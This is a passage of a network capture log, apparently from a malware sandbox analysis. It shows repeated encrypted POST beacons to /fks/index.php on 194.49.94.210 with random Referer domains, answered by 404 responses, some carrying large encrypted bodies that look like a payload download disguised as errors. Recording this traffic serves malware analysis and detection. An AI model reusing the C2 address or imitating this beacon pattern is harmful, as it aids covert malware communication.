cd 29 1e a5 7f 44 3b bf 29 02 9f 52 ec 37 20 09 0d 18 88 31 af d4 87 9d 7a c0 5a 53 22 c3 ee 55 d4 e5 bb cd 1d ce 17 ed a6 e5 06 7b b2 c5 db 28 21 be d9 8b f5 Data Ascii: 37802}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf+<2!<hzMu3U!o@QCF@3sPu-\T+7$A/}t<KL<Qrk5c@]V3@u_E"svaaAJ,r{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`pU:IO!%LQ2u6xQyGSk@7$lRN9LFtp>ciun)Kd!b~(OYD6Hv}j;]t-n$p<?CG3YF w0+.2l0^B.Dy@E1>v.+@%T_)mU{`',K=ZHyYr:y\|"Y+b5Yo_Zu\)K@Hy]?hDsmQZ~/p)B/9`XVOA\|aS^?(t vltEVzBCT(4Lqi5yaBR~V\|Kw}g!le2g.$OsHZ#Jgj7O{M>BcohMYGlv5;~4^tG#(18=$},KAAXhp% i$d)D;)R7 1zZS"U{(!
Nov 18, 2023 10:02:24.004383087 CET	225	IN	Data Raw: 22 92 0c 4e 7b 0c c7 51 7f 2f 92 c7 73 29 e2 5e ca dd 7a f5 fb ab 2b d9 96 80 48 c5 c5 21 1b b8 47 0f 6b fe 7f 02 2a 1f ff d0 6d 84 cb db 43 52 49 db 2b 03 06 a9 5a 29 1e 6b d6 d6 6d c1 3a ae 8a 19 ea 80 75 2e ff 00 05 aa 75 61 51 e3 ef 0a 44 a0 Data Ascii: "N{Q/s)^z+H!Gk*mCRI+Z)km:u.uaQD2o?zo$Sd3l./v}t ;d5%kwOT#I.\__y%uCAn3#?`IzET2Epdv}odd9hs8/Jm{w8L~:/4r#'\e
Nov 18, 2023 10:02:24.004403114 CET	226	IN	Data Raw: 7e ae 18 f5 85 5d d0 80 db 60 ef 56 cf 55 07 cb cc a9 39 f9 b5 6d 70 3c 75 c1 ae 85 43 91 10 a9 68 d0 81 ff e0 34 5d 08 9f b7 93 27 57 fe d2 ab 3c 1d 53 2c f1 49 eb 1c 14 d4 01 2c 6d 46 eb 80 fb df 1d 74 a3 dc c2 78 b9 6d 55 04 80 e9 d4 77 ee e1 Data Ascii: ~]`VU9mp<uCh4]'W<S,I,mFtxmUwo:JP,p+\,Zp+A$[ZTMRgLA6?4NcGzlqD}2v$372W$'u'_@uy'9^d')-?gmr7MD0[E
Nov 18, 2023 10:02:24.004472971 CET	227	IN	Data Raw: cb 92 72 14 8f ef 89 63 8a bd ad db c7 9d 12 48 6b a2 e3 a2 ea e8 c8 2f 45 26 68 e3 df cc 96 dc 73 a5 28 bf c7 97 93 e0 2a 58 49 50 0e 63 bd 78 fa 9c 33 f0 4b d0 aa f3 b9 e8 4c 35 bb fc 8d 7b a9 90 ed e7 48 47 cd 78 6f cc 37 28 3d 82 97 5f b4 7a Data Ascii: rcHk/E&hs(XIPcx3KL5{HGxo7(=_zXCn^NjyxViS`YAiI/7TBz;iJd-B-1Rm96Wr7EBwYD\_9&4F\xC
Nov 18, 2023 10:02:24.004491091 CET	229	IN	Data Raw: 18 47 3c 32 6c c8 92 2a 66 aa 04 e5 2d 49 b9 83 3f 98 2d aa 08 19 f5 23 a4 7e b3 b4 54 ad 2f 27 8d 43 aa 58 d8 f8 ce b8 b3 50 7d 1f 35 28 7b e3 85 6f 76 55 a8 53 08 eb 07 ac 58 5e f8 ae 4d df bd 6c 00 12 3a b6 e7 43 1d 82 50 ce 1f fa 3f f1 f0 9a Data Ascii: G<2lf-I?-#~T/'CXP}5({ovUSX^Ml:CP??Im6nXrsH$X6^{7=%PH\|E2T2Pd*XAc O+"y<CGV)8(rZr\| gA~QI!GCM+?Vt5i\|9Q~r
Nov 18, 2023 10:02:24.004508972 CET	230	IN	Data Raw: 5a fb 3e e8 f7 c8 0d 09 99 08 ab 83 89 0d 4a c6 b1 6b 9c 8c e2 62 4c 58 a9 eb 6b a4 16 2f d7 db bd df c8 58 ca 3c de 20 49 ba 0b 4d 76 10 2d b6 24 3f 6e 82 9c 27 4b 4f c1 1c e2 f2 a9 cf e2 a3 11 0e 2a 10 c5 1f 4a a5 ba 46 b7 a5 17 75 3d e4 2d 34 Data Ascii: Z>JkbLXk/X< IMv-$?n'KOJFu=-4)JND">@ME=EYbWhmYGV]:ta$/YWz2c%/r6y'F&UQq$1G^5;QtK=Y^s
Nov 18, 2023 10:02:24.004527092 CET	231	IN	Data Raw: 50 65 da 0e cd ef 3f 26 eb 33 0d 4f 89 e7 b2 8c ac 78 9c a9 7d 5e dd e0 28 50 f4 16 29 04 a7 61 8f aa f9 9e d2 5b e5 1a 87 4c c5 0d c2 28 ef fd d8 6d ab 9d 13 b9 82 fd 1a be f0 dc 83 8e c6 68 d0 a2 ac d6 9f 98 4d 04 3a 22 66 eb b5 1c fb cb 01 65 Data Ascii: Pe?&3Ox}^(P)a[L(mhM:"fe)Y2\|1!27-s]Y iQf9QhTNfQ\|k%0`+#06sZAx'/6Knx?V+-z%T?X:#yVIP=R4J@
Nov 18, 2023 10:02:24.004543066 CET	233	IN	Data Raw: 7f ab 77 7c 52 3f 72 8a 76 a1 59 d7 02 e7 78 5f ab 41 7f 7b 2f 5c 73 68 06 13 6f 88 75 a2 e5 10 30 6f 35 a8 9c ca 29 42 f0 fa 7c 25 27 07 16 c4 b3 df fe 70 1c bd c1 31 c9 9c 88 cf a2 01 6a 2f 18 75 99 9d 34 5f 0d 4c cb 55 05 9d be c4 bc 4d 69 ad Data Ascii: w\|R?rvYx_A{/\shou0o5)B\|%'p1j/u4_LUMieB{\or^M AO@JyqN?\|HxM,!Bp9!L0 fa<e$[U> , (>$hB={P^:(
Nov 18, 2023 10:02:24.004560947 CET	234	IN	Data Raw: 78 5b 82 a6 6d 59 52 48 77 69 f1 d4 73 8d 99 96 9c 0e d0 1d a6 6f f7 d5 79 41 5f c3 59 f3 a7 df 19 c8 1d b8 9f 35 ca 9a 97 0e 08 8c bb 07 5c a9 d4 b7 64 7f e1 c0 1a cb 26 ef d5 f2 f7 81 16 17 ff 88 82 43 65 2b 88 43 61 f2 26 61 c3 fe 52 26 0a 56 Data Ascii: x[mYRHwisoyA_Y5\d&Ce+Ca&aR&Vj4(jkH=Z:)[{}N5<+gb)RQuD4$<wyx vP;XCUH@wRA:e*f:SvF?Cwb7]ye3t^9
Nov 18, 2023 10:02:24.004579067 CET	235	IN	Data Raw: 39 67 e9 20 ea 3a 0f 66 1a fc a1 7d c5 73 38 38 09 01 68 6f 65 f7 f6 0e d7 25 99 f2 f7 32 ad 11 34 8c cc 41 63 1c c1 df 68 16 8a 23 b3 1f 5d 9c 67 f9 cf 03 03 bc e5 54 87 75 74 dc 45 9b 7b 4e 71 24 9a a4 86 8e 24 1c dd fd 44 e3 8f b6 b4 c6 e3 e7 Data Ascii: 9g :f}s88hoe%24Ach#]gTutE{Nq$$DVpb%O-2&-I (5x[Dh:VdNx"PD~`83wj&.J`xoHvPIJK!AOiL_to)Fy_-C0h~'yw"h;
Nov 18, 2023 10:02:24.300873041 CET	237	IN	Data Raw: 52 a8 e7 fa 88 1a cf 56 93 d5 e4 d1 bd 33 e7 9d 74 ab e6 0c 12 95 94 af 48 74 7c 71 72 f3 83 55 50 35 86 f7 1e 48 f6 f9 5c 1b e1 3d a5 f4 3c 0a 40 b1 c5 cf 1c c5 46 b3 61 ea 95 aa b4 cd 7e 9c fa aa cc a7 16 57 63 71 9a 55 da 2e 9c 34 d5 59 4e cd Data Ascii: RV3tHt\|qrUP5H\=<@Fa~WcqU.4YN\7z?4sV(R$>ga[afw~nKhVUAvBQYb1T;aquo1);b].&/Y(Fcaf
Nov 18, 2023 10:02:25.302119017 CET	459	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rjroicjqqmgntlw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: 194.49.94.210
Nov 18, 2023 10:02:25.302160978 CET	460	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a2 d5 f3 c9 39 df 28 fc fa 51 86 2a Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(Q*?^WJit{g@]Sw;3hP\/Oe1,xUG f8zl^a[AnnS\mPfC#EG}@sbD,b@x}ob-\|oy8=G2j%<n
Nov 18, 2023 10:02:25.605895042 CET	461	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:25.648957014 CET	461	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bhniqbswtnh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: 194.49.94.210
Nov 18, 2023 10:02:25.649039030 CET	461	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a3 d5 f3 c9 38 df 28 fc c9 42 ff 52 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(BRXVeVs2gc))`e3NtnlVP9`G1U!7A7twLCxUpH#=_!ap}^pz_
Nov 18, 2023 10:02:25.951236963 CET	462	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:25 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 36 36 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 0d dd 66 e2 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c fb 18 d3 e4 49 c1 7a 4d 8a a4 75 b4 e3 41 51 21 6f 40 51 f8 43 2b 43 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 32 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 b7 db a1 ca 70 83 e8 b9 5f c5 27 18 61 4f 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 77 97 af a6 7b b2 be 0c f3 92 0f cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 1f ce e8 b1 55 84 3a a6 07 4d 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 40 77 e1 47 e4 7c 0c 53 e2 35 df 87 b4 c7 d2 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 c1 6c c2 75 6e fd 29 2a 5b de 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 30 23 6e 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 5a 72 2d 6e 14 ec 06 8d e4 24 bf 70 01 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 58 df d2 60 2e 97 0f 21 e8 6e 3f cf 52 3c 50 b6 17 ef 96 b1 43 e7 42 21 dc 55 3f fc a7 17 d2 40 ed 83 a1 42 37 98 da f9 ec ef 27 e8 bd 8f f6 34 40 01 9c 24 e9 9d a6 b4 0b 0c 35 19 11 d5 ba 96 d3 78 c6 46 45 ad 08 20 03 3d 7c 38 fb 34 3a 80 37 93 33 25 74 a2 2f 62 97 48 82 46 2f 86 c5 20 2e f4 0b 11 10 4f 9b 54 0a 4b b2 22 c0 97 9b e6 81 99 c0 43 8c 37 af ec d4 21 3c 8e ed dc 8f 98 9c 0c e3 48 1d ad 88 0a 0b fa bb 31 a9 d1 dd a9 83 b3 a3 e6 06 23 20 7f d2 53 a7 9f 92 e0 f4 76 0d b5 23 7c 90 7c 32 60 ee 64 7c d0 9e 07 6f 2d 84 b6 e3 ee 4a fe 55 11 ea 2c 21 dc 45 c5 05 ec 1a 92 26 0c 70 a2 f1 51 18 21 7b 48 54 97 e3 cf 52 cc 93 a0 7c b4 e0 0d 65 7f f9 f6 4c 48 6a 06 e7 99 ba 95 eb e0 6d 08 bf 1e b0 c4 1e a2 ec 52 91 91 7d 32 af 5e 1a 8c 3a ab 58 fd 55 26 a3 f6 e5 ca 65 74 a8 96 de c7 f9 58 42 37 a0 1c 78 59 dc 87 89 a6 40 4e 3c fe 3b e9 03 b7 9e b4 fd 9a 00 f5 c7 6d 6d 00 e1 b9 35 68 d2 c9 c5 f3 03 6a 3a 6b 4a e3 f1 63 07 08 fd 58 ea bc f4 0d 3c e8 b7 dc 71 2c cb d3 72 32 52 d0 79 58 e7 17 86 6c c8 82 c9 b8 1c 47 aa 60 9b fc 10 d2 1e 55 33 7e 8d 35 7d e8 57 37 2a fd 4d d6 e6 a8 df 72 31 39 a5 80 26 7b 11 bf 2c bc c2 14 0f 14 ce 57 9b f8 d1 62 65 b5 74 df 0e 0d 49 39 b1 67 2e bb 89 19 5b b0 20 b5 e3 ce 7b ef d4 07 79 23 14 bc 52 8d a4 10 04 95 7e 18 cd 28 dd aa 6b ff 8e 31 cb 4a c9 e2 b5 18 d6 58 d7 45 29 5a 55 69 dd fb 7e 55 94 6f 78 8c 5a df 47 4c f3 f4 e6 ae 52 4a 9a 5d 1d e5 1e Data Ascii: 66802}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rff!<IzMuAQ!o@QC+C@3sPu-\T+2$A/}t<KL<Qrk5c@]Vp_'aOsvaaAJ,w{xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`@U:MO!%LQ2u6xQy@wG\|S5@7$lRN9LFtp>clun)[d!b~(O[D6Hv}0#n;]tZr-n$p>?C3YF w0+.2X`.!n?R<PCB!U?@B7'4@$5xFE =\|84:73%t/bHF/ .OTK"C7!<H1# Sv#\|\|2`d\|o-JU,!E&pQ!{HTR\|eLHjmR}2^:XU&etXB7xY@N<;mm5hj:kJcX<q,r2RyXlG`U3~5}W7Mr19&{,WbetI9g.[ {y#R~(k1JXE)ZUi~UoxZGLRJ]
Nov 18, 2023 10:02:26.390710115 CET	898	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxgskimjbliad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: 194.49.94.210
Nov 18, 2023 10:02:26.390710115 CET	898	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a3 d5 f3 c9 39 df 28 fc 9a 45 95 6d Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(Em\\>brkx]`y::Q+sF@*2[K3j%@ 8
Nov 18, 2023 10:02:26.692178011 CET	899	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:28.442025900 CET	906	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nvodgmuklrb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: 194.49.94.210
Nov 18, 2023 10:02:28.442065954 CET	907	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a0 d5 f3 c9 38 df 28 fc fe 43 e5 73 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(CsSbZw%Q3\|b#hkO&V_8n"I@`T
Nov 18, 2023 10:02:28.744863987 CET	908	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:28 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 31 62 65 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 79 c7 5f a5 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c ff f7 d4 e4 d3 ce 7a 4d 8a a4 75 b4 f3 ec 56 21 6f 40 51 f8 43 4b 44 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 62 36 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 77 76 a6 ca 69 83 e8 b9 5f a5 20 18 eb 4d 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 73 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 f3 c9 e8 b1 55 84 3a a6 eb 4a 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe ca 75 e1 47 e4 1c 0b 53 e2 3b df 87 b4 13 d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 68 c2 75 6e fd 29 2a 81 d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 8e 69 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 de 7b 2c 6e 58 4f 03 8d e6 24 bd 70 44 3e 3f 43 aa dc c9 cc 9e dc a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 59 60 74 32 47 dd 7e 72 0d 86 64 f3 97 e4 f1 df d3 bb 02 85 5c 7a 07 d0 64 af 67 57 f9 f4 d1 d3 db b3 5b 17 8d ee b7 0f 7d 23 51 79 7d 8d ba 11 5f e4 4b d8 42 b7 6d 63 5a 39 71 99 df b7 19 19 8a c9 9c 0f e9 17 13 47 cc d7 72 a0 2d ca fa 61 7b bc 46 27 54 ee df 70 b8 0e 15 e5 c1 54 3c e6 96 7a 54 f6 b8 dc 07 c1 64 27 c8 c9 a1 c4 c2 3c 57 25 43 6e d9 41 8e 3f 8f c3 55 a7 7c 17 47 dc 95 cc 6a 22 34 20 f1 72 4c a1 85 5a 6d 6b ac 74 3c 56 ec 50 f4 af 8d 68 23 77 0b f9 a4 2a ce c2 f7 6f 69 64 84 63 03 e2 c2 33 4f b0 e8 53 10 68 20 d5 94 0e aa 92 fb 95 15 a5 81 c0 9e c5 2e 78 49 d2 4e 54 d9 ef 0c 48 ab f7 17 cf c2 e0 1b 78 13 b3 40 83 33 f2 e2 ef 42 73 76 a1 6c 09 c1 2c f5 66 92 92 fc 40 af 0b c6 ce cb 5e cd 83 e4 f7 ad ae fa c0 be f6 bf 3e 48 bf 32 47 cb 27 21 aa 0e 1b 79 5f 9f f0 6a 55 9b 40 b0 c7 15 55 9a f8 3b 7e 7d 6b 56 6c 82 2b 21 f6 61 a8 87 71 03 10 b3 b2 94 f0 46 9a b4 19 ba 8b 33 fb ea 6c e8 1f 61 a3 a0 dc b1 03 e8 a2 f3 62 76 be 5d 63 2c b9 d9 b6 fe d3 5d 0e 74 0f df a5 7a f1 ec f1 39 3d 36 f6 44 0d 6b 83 f5 4d eb fa c4 b7 7e 2f 04 83 bc d8 86 cc 8b 8a e9 44 b7 ba a5 64 be 2b b1 4e 15 6c 4e d8 3e 10 a7 34 23 0d 7e 52 9f 34 75 23 7a 71 18 f2 08 97 81 c5 b1 bd ab d0 0f bb 89 1d 7a 05 a6 36 db 65 b4 a7 ca 12 23 95 06 dc 20 c3 5d 34 e5 6c f1 a7 f5 7e e4 2e 90 92 81 1c f2 6b 43 d6 6c 7c ba 2e 6f 4c 8a 00 01 be f9 e7 76 6d b0 10 1f 3d c3 88 a0 69 65 1a 72 fc 76 d1 0b c7 b7 07 d9 Data Ascii: 1be02}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfy_!<zMuV!o@QCKD@3sPu-\T+b6$A/}t<KL<Qrk5c@]Vwvi_ MsvaaAJ,s{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:JO!%LQ2u6xQyuGS;@7$lRN9LFtp>cahun)d!b~(OYD6Hv}hi;]t{,nXO$pD>?C3YF w0+.2Y`t2G~rd\zdgW[}#Qy}_KBmcZ9qGr-a{F'TpT<zTd'<W%CnA?U\|Gj"4 rLZmkt<VPh#woidc3OSh .xINTHx@3Bsvl,f@^>H2G'!y_jU@U;~}kVl+!aqF3labv]c,]tz9=6DkM~/Dd+NlN>4#~R4u#zqz6e# ]4l~.kCl\|.oLvm=ierv
Nov 18, 2023 10:02:29.254941940 CET	1027	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vrbtkwrvvvx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: 194.49.94.210
